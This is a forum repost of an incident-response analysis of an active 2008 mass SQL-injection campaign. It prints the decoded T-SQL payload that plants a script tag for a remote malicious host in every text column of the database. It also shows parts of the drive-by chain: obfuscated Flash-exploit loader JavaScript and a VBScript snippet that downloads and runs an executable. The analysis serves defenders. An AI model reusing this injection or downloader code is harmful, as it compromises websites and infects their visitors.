Scott one of our readers wrote in to let us know that attempts were being made on his servers through an SQL injection. He was the first and assisted with analysis, but he was not the last. Since the first report we have received several in the last 4 hours or so. There seems to be a lot of activity with this particular attack. It looks like a repeat/variant on the attacks mentioned by Bojan here. Overview: |---i/f16.swf |--- i1.html ---|---i/f28.swf |--- Flash.htm -------| |---i/f64.swf | |--- f2.html ---|---i/f115.swf |--- 06014.htm |---i/f45.swf | |---i/f47.swf w.js --- new.htm ---|--- yahoo.htm--| | | |--- office.htm--| --rondll32.exe--msyahoo.exe--wsv.exe/thunder.exe | | |--- ksx.htm ----| The Injection: The string being injected is HTTP/1.1 302 26 - .NET CLR 2.0.50727) : Which breaks down into: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update['+@T+'] set ['+@C+']=['+@C+']+''/titlescript src=hXXp://sdo. 1000mg.cn/csrss/w.js/script!--'' where '+@C+' not like ''%/titlescript src=hXXp: //sdo. 1000mg.cn/csrss/w.js/script!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@) Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet. Next: A user visiting the site will hit w.js which, if they are using english, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html i1.html f2.html These file contains some java script: script type=text/javascript src=swfobject.js/script div id=flashcontent111/divdiv id=flashversion222/div script type=text/javascript c=118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41c=eval(Strin g.fromCharCode(+c+)document.write(script+c+\/script /scriptif(version['major']==9){document.getElementById('flashversion').inner HTML=if(version['rev']==115){var so=new SWFObject(./f115.swf,mymovie,0.1,0.1,9,#000000so.write(flashco ntent)}else if(version['rev']==64){var so=new SWFObject(./f64.swf,mymovie,0.1,0.1,9,#000000so.write(flashcon tent)}else if(version['rev']==47){var so=new SWFObject(./f47.swf,mymovie,0.1,0.1,9,#000000so.write(flashcon tent)}else if(version['rev']==45){var so=new SWFObject(./f45.swf,mymovie,0.1,0.1,9,#000000so.write(flashcon tent)}else if(version['rev']==28){var so=new SWFObject(./f28.swf,mymovie,0.1,0.1,9,#000000so.write(flashcon tent)}else if(version['rev']==16){var so=new SWFObject(./f16.swf,mymovie,0.1,0.1,9,#000000so.write(flashcon tent)}else if(version['rev']=124){if(document.getElementById){document.getElem entById('flashversion').innerHTML= document.write() So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT detect the file as malicious and for FF 10/36 detect the file as being malicious. yahoo.htm The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute. pre object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'/object script language='vbscript' test.GetFile hXXp://www.XXXXX.com/XXXX/rondll32.exe,c:\\msyahoo.exe,5,1,tiany Set WshShell = CreateObject(WScript.Shell) WshShell.Runc:\\msyahoo.exe /script /pre Office.htm Attempts to create activeX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe ksx.htm Attempts get the browser to include the rondll32.exe file Detection for rondll32.exe is good with most AV products catching this one. 06014.htm was unavailable at the time I checked. These attacks are happening right now. The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops. Cheers. Mark - Shearwater
More...
08-08-2008, 09:21 AM
More SQL Injections - very active right now, (Fri, Aug 8th)
Linear Mode
